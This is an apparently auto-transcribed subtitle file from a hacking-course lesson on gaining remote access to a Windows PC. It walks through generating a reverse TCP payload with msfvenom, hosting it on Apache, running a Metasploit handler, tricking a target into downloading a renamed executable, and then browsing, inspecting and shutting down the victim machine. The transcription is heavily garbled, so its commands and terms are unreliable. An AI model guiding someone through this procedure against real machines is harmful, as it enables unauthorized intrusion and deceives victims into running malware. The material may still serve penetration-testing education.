1
00:00:00,840 --> 00:00:08,670
In this lesson, we will see how we can gain remote access to our target system by using a payload which

2
00:00:08,670 --> 00:00:10,850
is created using mode framework.

3
00:00:12,210 --> 00:00:17,610
So for this, it is going to be an on a machine and window.

4
00:00:17,620 --> 00:00:19,430
There is a target system.

5
00:00:19,920 --> 00:00:20,230
Right.

6
00:00:21,360 --> 00:00:24,670
So I have gone up some steps for you to follow.

7
00:00:24,960 --> 00:00:31,400
Right now, the very first command is MSF venom.

8
00:00:31,680 --> 00:00:36,240
So MSF venom is going to help us in order to generate payload.

9
00:00:36,780 --> 00:00:37,090
Right.

10
00:00:37,710 --> 00:00:44,540
So MSF will, first of all, let the MSF venom hyphenate hyphenates is for help.

11
00:00:45,000 --> 00:00:45,320
Right.

12
00:00:45,690 --> 00:00:51,650
So it's going to show all of the available options to be used with MSF venom.

13
00:00:51,660 --> 00:00:52,140
Come on.

14
00:00:54,590 --> 00:00:56,820
Right, let's see.

15
00:00:57,350 --> 00:01:04,880
There are so many options, but the one which we are going to use is Alphabeat, which stands for payload.

16
00:01:05,990 --> 00:01:07,040
So let's do that.

17
00:01:09,270 --> 00:01:16,410
I myself am hyphen before Feyenoord, then we are generating fuel for Windows and then we the printer

18
00:01:17,940 --> 00:01:25,800
and then reversed DCPI right now we have to set and host that is localhost.

19
00:01:26,190 --> 00:01:28,230
So localhost is Alcalay.

20
00:01:31,330 --> 00:01:38,670
And local board will be one, two, three, four, right?

21
00:01:39,280 --> 00:01:41,460
And then we have to set format.

22
00:01:41,470 --> 00:01:49,420
So I have an iPhone format, so it's going to be easy for Windows and then the name of the payload.

23
00:01:49,580 --> 00:01:51,070
Let's say, Jack, what?

24
00:01:52,150 --> 00:01:54,520
OK, hit enter.

25
00:01:54,830 --> 00:02:06,070
And MSF is going to generate a Windows payload for us with the name Jack or Dot Yixin right now, very

26
00:02:06,070 --> 00:02:09,310
generic payload and host it on our local machine.

27
00:02:09,580 --> 00:02:09,910
Right.

28
00:02:10,870 --> 00:02:12,910
By using Apache Web server.

29
00:02:14,290 --> 00:02:20,320
Now, if you go to the Internet and search for the set of a particular set of eyes, then you will know

30
00:02:20,320 --> 00:02:27,470
that around 60 percent of the Web sites from all around the world are running on Apache Web server.

31
00:02:28,060 --> 00:02:34,860
OK, now, if you don't know how to configure Apache, then I have explained this in practical in very

32
00:02:34,880 --> 00:02:39,250
you did in the second section of this course, which is called Linux for Beginners.

33
00:02:39,460 --> 00:02:50,010
OK, now let's copy our payload, which is Jack got to wear that with a little blue and it's dormant.

34
00:02:50,350 --> 00:02:55,200
So this part is the default pod for Apache Web server.

35
00:02:55,210 --> 00:02:55,480
Right.

36
00:02:55,720 --> 00:03:00,790
So if you are going to host your website, then you have to use this folder that is HDMI and you have

37
00:03:00,790 --> 00:03:02,820
to host your website under this folder.

38
00:03:04,990 --> 00:03:06,920
So let's copy that.

39
00:03:08,030 --> 00:03:12,050
Now we have to start to services.

40
00:03:12,100 --> 00:03:16,180
The first is Service Postgres Equal.

41
00:03:16,180 --> 00:03:17,220
That is your Eskil.

42
00:03:17,350 --> 00:03:19,000
OK, start.

43
00:03:22,190 --> 00:03:26,910
Right now, we have to start Apache Web server as well.

44
00:03:26,930 --> 00:03:30,110
So service Apache to start.

45
00:03:33,610 --> 00:03:43,990
Right then now let's start MSF console that is made us a framework console, so.

46
00:03:45,630 --> 00:03:52,120
The next goal would be to use exploit, right, to use and.

47
00:03:53,550 --> 00:03:54,790
So it's a very important step.

48
00:03:54,810 --> 00:03:58,040
So we'll start with use exploit multivalent.

49
00:03:58,530 --> 00:04:01,150
Then we will going to set Bellona for Windows.

50
00:04:01,590 --> 00:04:07,200
OK, then we'll set the localhost and local board and then we will use exploit feature.

51
00:04:08,130 --> 00:04:14,440
OK, so this is how we are going to get remote access to automatic PC.

52
00:04:15,060 --> 00:04:19,740
Right now, let's move back to Cali.

53
00:04:23,260 --> 00:04:28,960
OK, it says, is starting to be desperate for framework console, so we have to wait for it.

54
00:04:31,670 --> 00:04:48,400
Then, OK, so use exploit multi panel and then set the for windows made furniture.

55
00:04:50,270 --> 00:04:55,460
OK, it's going to autocomplete because I recently passed that key.

56
00:04:57,210 --> 00:04:59,160
So we have to wait for this.

57
00:05:03,140 --> 00:05:08,070
It Britain, the ECB, the.

58
00:05:09,260 --> 00:05:19,820
Now said at least reduced standards to the day and then set a report, which is one, two, three,

59
00:05:19,820 --> 00:05:26,000
four, but now it's time to exploit, right.

60
00:05:28,160 --> 00:05:30,850
OK, so your options, right.

61
00:05:33,030 --> 00:05:37,950
Sure, options to see all of the available options to be used here, right?

62
00:05:38,250 --> 00:05:46,440
So it has mentioned that you have said localhost and you already said local, but then now exploit half

63
00:05:46,440 --> 00:05:47,940
an edge for help.

64
00:05:48,900 --> 00:05:51,210
And we are going to use two different options.

65
00:05:51,330 --> 00:05:57,900
One is Hyphen G, which says that and in the context of a job and then hyphen Z, we says do not interact

66
00:05:57,900 --> 00:06:00,180
with the station after a successful exploitation.

67
00:06:00,690 --> 00:06:01,050
Right.

68
00:06:01,980 --> 00:06:08,790
So exploit hyphen Jay Z and let's move to our Target PC, OK?

69
00:06:09,810 --> 00:06:19,160
Now it's up to you how you show your creativity to force your target, to go to the you are we help

70
00:06:19,170 --> 00:06:20,780
nobody exploit.

71
00:06:21,060 --> 00:06:23,590
OK, I believe we ought to be helping the payload.

72
00:06:24,060 --> 00:06:35,850
So suppose that Target visited your website and somehow you managed to redirect him to the payload section

73
00:06:36,180 --> 00:06:37,410
which would be checked.

74
00:06:37,420 --> 00:06:39,760
What dot xy.

75
00:06:40,200 --> 00:06:45,770
So then dot, dot, dot dot then is your website address.

76
00:06:46,290 --> 00:06:51,960
OK, suppose this is your website address and then Jack Baudot is the bit.

77
00:06:52,950 --> 00:06:59,550
Would you want your target to visit in order to download the exploit.

78
00:06:59,550 --> 00:07:06,280
See, as soon as your target leads to this page, the download has been started and ask for random payload.

79
00:07:07,440 --> 00:07:15,520
Now your target would not know that this is a payload.

80
00:07:16,470 --> 00:07:17,990
OK, so you can change its name.

81
00:07:18,210 --> 00:07:22,030
Let's say you have one something or like that.

82
00:07:22,080 --> 00:07:24,300
OK, let me draw extra.

83
00:07:27,480 --> 00:07:37,190
Right now, let's move to Cali and exploit it says started reverse the loop.

84
00:07:38,140 --> 00:07:39,990
Okay, so let's see.

85
00:07:40,980 --> 00:07:44,920
Sessions open, I would say is no accusation.

86
00:07:44,940 --> 00:07:47,390
OK, so let's try and exploit Typhon.

87
00:07:47,400 --> 00:07:48,990
See, have frenzy again.

88
00:07:52,190 --> 00:07:57,070
Explode fairly because, OK, one, two, three, four is already in use.

89
00:08:01,310 --> 00:08:09,590
OK, so it automatically started this session again, that is gone or closes the event, but Riverport

90
00:08:10,130 --> 00:08:14,760
just to stop the previous services and then it has started again, right?

91
00:08:16,250 --> 00:08:18,210
So it says sending state.

92
00:08:18,230 --> 00:08:19,550
OK, so we made a decision.

93
00:08:19,550 --> 00:08:20,360
One more point.

94
00:08:20,960 --> 00:08:21,560
That's good.

95
00:08:23,030 --> 00:08:24,170
Let's take a..

96
00:08:25,130 --> 00:08:27,920
And let's see where the decision started or not.

97
00:08:29,190 --> 00:08:29,480
Yes.

98
00:08:29,480 --> 00:08:30,680
Decision has been started.

99
00:08:31,320 --> 00:08:31,580
Right.

100
00:08:32,660 --> 00:08:34,910
So let's use this session.

101
00:08:38,210 --> 00:08:47,180
OK, so sessions hyphenate and then decision number, which is one, so Sessions, hasn't I?

102
00:08:47,360 --> 00:08:55,290
And then one done now regarding target system --, right.

103
00:08:55,700 --> 00:09:05,690
If you want to verify, let's do BWB see voting system 32, folder of C Drive of our target system.

104
00:09:05,970 --> 00:09:06,340
Right.

105
00:09:06,620 --> 00:09:07,730
Let's do less.

106
00:09:09,420 --> 00:09:13,890
So it will list of all of the directories and finds out there see?

107
00:09:15,440 --> 00:09:23,310
OK, now let's perform some more commands like if config, so let's do that.

108
00:09:24,530 --> 00:09:30,890
So if config it says then Dawid zero to seven.

109
00:09:31,370 --> 00:09:36,650
Good, let's verify whether the information is correct or not.

110
00:09:39,100 --> 00:09:41,140
So let's open Goman from.

111
00:09:44,320 --> 00:09:52,340
And let's do I be config, let's verify, see, here it is.

112
00:09:53,200 --> 00:09:56,410
OK, so 10 or not two, not seven.

113
00:09:59,070 --> 00:09:59,760
That's good.

114
00:10:01,200 --> 00:10:07,320
Now, we can also shut down our target PC, right?

115
00:10:07,740 --> 00:10:09,110
So let's do that.

116
00:10:09,120 --> 00:10:11,400
So powered off it and then.

117
00:10:12,160 --> 00:10:13,110
OK, come on.

118
00:10:13,830 --> 00:10:16,770
So we hope to shut them down.

119
00:10:18,540 --> 00:10:22,080
See, the Windows 10 is going to power off.

120
00:10:22,410 --> 00:10:23,720
It's shutting down.

121
00:10:24,270 --> 00:10:24,600
Right.

122
00:10:25,140 --> 00:10:31,430
So this is how we can get remote access to our target system and do whatever we want to do.